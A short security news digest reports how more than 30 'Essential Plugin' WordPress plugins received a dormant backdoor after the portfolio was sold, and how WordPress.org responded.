Backdoor Found In 30+ WordPress Plugins After Ownership Change

WordPress.org removed more than 30 plugins from its directory after identifying a backdoor that affected installations across thousands of websites. The plugins were part of a portfolio known as “Essential Plugin,” a collection developed over several years and used to extend common site features such as sliders, galleries, and widgets.

The sequence of events began with a public sale of the portfolio in 2025. After the transfer, updates introduced code that appeared routine in changelogs but later proved to include a hidden backdoor.

That code remained inactive for months, blending into normal plugin behavior, before activating in early April 2026 and initiating the distribution of unauthorized payloads to sites where the plugins were installed.

Why It Matters: This incident shows how control over widely distributed software can translate into access across thousands of systems, especially when ownership changes are not visible and do not trigger additional review. It also highlights a gap between how software is trusted and how it is governed, where routine updates can introduce risk without clear signals to those responsible for security and operations.

• Timeline Links Ownership Change and Activation: The plugins had been maintained for years by their original developers before the portfolio was sold. After the acquisition, a new version introduced additional code under the guise of a routine compatibility update. In reality, this update added a backdoor in August 2025, which stayed inactive until April 5–6, 2026, when it was triggered.

• Backdoor Design Enabled Controlled Execution Through Standard Functions: The malicious code relied on standard PHP functions like “file_get_contents()” and “unserialize()” to pull in instructions from an external server and interpret them. It also exposed a REST API endpoint without any permission checks. In practice, this meant the attacker could send data to the site and have it executed as code, with full control over what ran and how it behaved.

• Infection Path Extended Outside the Plugin Itself: Once activated, the plugins pulled down an additional file that was made to look like a legitimate WordPress component. That file then inserted a large block of PHP code into “wp-config.php”. Because this file runs on every request and usually isn’t touched by plugin updates, the injected code stayed in place even after the plugin itself was disabled or updated.

• Behavior Was Tailored to Reduce Visibility During Normal Use: The injected code served spam links and redirects in a way that was hard to spot, appearing only to search engine crawlers like Googlebot. Someone visiting the site normally would see nothing unusual. The system that delivered instructions also used a blockchain-based method to resolve its endpoint, which let the attacker change where the code connected without depending on a fixed domain.

• Platform Response Contained Distribution but Not Full Remediation: WordPress.org closed all affected plugins in one action and pushed forced updates that disabled the communication pathway used by the backdoor. However, these updates did not remove code already written into “wp-config.php”. As a result, affected sites required additional inspection and cleanup. The event also draws attention to the absence of alerts or review processes tied to plugin ownership changes, which allowed the transition and subsequent updates to proceed without additional scrutiny.

Go Deeper -> Someone Bought 30 WordPress Plugins and Planted a Backdoor in All of Them. – Austin Ginder

Someone planted backdoors in dozens of WordPress plug-ins used in thousands of websites – TechCrunch